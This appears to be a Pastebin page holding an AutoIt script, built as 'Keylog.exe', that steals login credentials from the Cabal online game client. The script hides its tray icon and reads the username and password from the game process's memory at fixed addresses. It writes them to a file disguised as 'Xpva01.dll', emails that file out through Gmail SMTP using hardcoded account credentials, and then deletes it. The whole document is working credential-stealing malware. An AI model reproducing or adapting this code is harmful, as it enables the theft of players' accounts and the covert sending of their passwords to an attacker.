Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #NoTrayIcon
- #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
- #AutoIt3Wrapper_icon=..\Program Files\Cabal.X-world_client\Cabal.X-world client\lolz.ico
- #AutoIt3Wrapper_outfile=Keylog.exe
- #AutoIt3Wrapper_Res_Comment="Keylog" :)
- #AutoIt3Wrapper_Res_Fileversion=0.9.0.2
- #AutoIt3Wrapper_Res_Fileversion_AutoIncrement=y
- #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
- #include <nomadmemory.au3>
- #include <SMTP.au3>
- Global $Value
- Global $Value2
- Global $Value3
- Global $Value4
- Global $Value5
- Global $Value6
- Global $Value7
- Global $Value8
- Global $Value9
- Global $Value10
- Global $Value11
- Global $Value12
- Global $Value13
- Global $Value14
- Global $Value15
- Global $Value16
- Global $Value17
- Global $Value18
- Global $Value19
- Global $Value20
- Global $Value21
- Global $Value22
- Global $Value23
- Global $Value24
- Global $Value25
- Global $Value26
- Global $Value27
- Global $Value28
- Global $Value29
- Global $Value30
- Global $pid
- Global $sv_type = "CHAR"
- Global $file = FileOpen("Xpva01.dll", 1)
- Global $GmailUser, $GmailPass, $ToEmail
- sleep(500)
- $pid = WinGetProcess("CABAL")
- dupa($pid)
- ; "magic" section
- func dupa($pid)
- $openmem = _MemoryOpen($pid)
- $Value = _MemoryRead(0x00C2C4D4, $openmem, $sv_type) ;login
- $Value2 = _MemoryRead(0x00C2C4D5, $openmem, $sv_type)
- $Value3 = _MemoryRead(0x00C2C4D6, $openmem, $sv_type)
- $Value4 = _MemoryRead(0x00C2C4D7, $openmem, $sv_type)
- $Value5 = _MemoryRead(0x00C2C4D8, $openmem, $sv_type)
- $Value6 = _MemoryRead(0x00C2C4D9, $openmem, $sv_type)
- $Value7 = _MemoryRead(0x00C2C4DA, $openmem, $sv_type)
- $Value8 = _MemoryRead(0x00C2C4DB, $openmem, $sv_type)
- $Value9 = _MemoryRead(0x00C2C4DC, $openmem, $sv_type)
- $Value10 = _MemoryRead(0x00C2C4DD, $openmem, $sv_type)
- $Value11 = _MemoryRead(0x00C2C4DE, $openmem, $sv_type)
- $Value12 = _MemoryRead(0x00C2C4E0, $openmem, $sv_type)
- $Value13 = _MemoryRead(0x00C2C4E1, $openmem, $sv_type)
- $Value14 = _MemoryRead(0x00C2C4E2, $openmem, $sv_type)
- $Value15 = _MemoryRead(0x00C2C4E3, $openmem, $sv_type) ;login end
- $Value16 = _MemoryRead(0x00C2C4F0, $openmem, $sv_type) ;password
- $Value17 = _MemoryRead(0x00C2C4F1, $openmem, $sv_type)
- $Value18 = _MemoryRead(0x00C2C4F2, $openmem, $sv_type)
- $Value19 = _MemoryRead(0x00C2C4F3, $openmem, $sv_type)
- $Value20 = _MemoryRead(0x00C2C4F4, $openmem, $sv_type)
- $Value21 = _MemoryRead(0x00C2C4F5, $openmem, $sv_type)
- $Value22 = _MemoryRead(0x00C2C4F6, $openmem, $sv_type)
- $Value23 = _MemoryRead(0x00C2C4F7, $openmem, $sv_type)
- $Value24 = _MemoryRead(0x00C2C4F8, $openmem, $sv_type)
- $Value25 = _MemoryRead(0x00C2C4F9, $openmem, $sv_type)
- $Value26 = _MemoryRead(0x00C2C4FA, $openmem, $sv_type)
- $Value27 = _MemoryRead(0x00C2C4FB, $openmem, $sv_type)
- $Value28 = _MemoryRead(0x00C2C4FC, $openmem, $sv_type)
- $Value29 = _MemoryRead(0x00C2C4FD, $openmem, $sv_type)
- $Value30 = _MemoryRead(0x00C2C4FE, $openmem, $sv_type) ;password end
- _MemoryClose($openmem)
- Return $Value
- endfunc ; end "magic" section
- FileWrite($file, $Value)
- FileWrite($file, $Value2)
- FileWrite($file, $Value3)
- FileWrite($file, $Value4)
- FileWrite($file, $Value5)
- FileWrite($file, $Value6)
- FileWrite($file, $Value7)
- FileWrite($file, $Value8)
- FileWrite($file, $Value9)
- FileWrite($file, $Value10)
- FileWrite($file, $Value11)
- FileWrite($file, $Value12)
- FileWrite($file, $Value13)
- FileWrite($file, $Value14)
- FileWrite($file, $Value15)
- FileWrite($file, $Value16)
- FileWrite($file, $Value17)
- FileWrite($file, $Value18)
- FileWrite($file, $Value19)
- FileWrite($file, $Value20)
- FileWrite($file, $Value21)
- FileWrite($file, $Value22)
- FileWrite($file, $Value23)
- FileWrite($file, $Value24)
- FileWrite($file, $Value25)
- FileWrite($file, $Value26)
- FileWrite($file, $Value27)
- FileWrite($file, $Value28)
- FileWrite($file, $Value29)
- FileWrite($file, $Value30)
- fileclose($file)
- ;wysyłanie maila =)
- $GmailUser = "testerdupa1@gmail.com"
- $GmailPass = "dupa123456"
- $ToEmail = ""
- $StmpServer = "smtp.gmail.com"
- $Temat = "login&pass"
- $Tresc = "..."
- $Nadawca = "login&pass logger"
- $s_AttachFiles = "Xpva01.dll"
- _INetSmtpMailCom($StmpServer, $Nadawca, $GmailUser, $ToEmail, $GmailUser, $GmailPass, $Temat, $Tresc, $s_AttachFiles)
- filedelete("Xpva01.dll")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement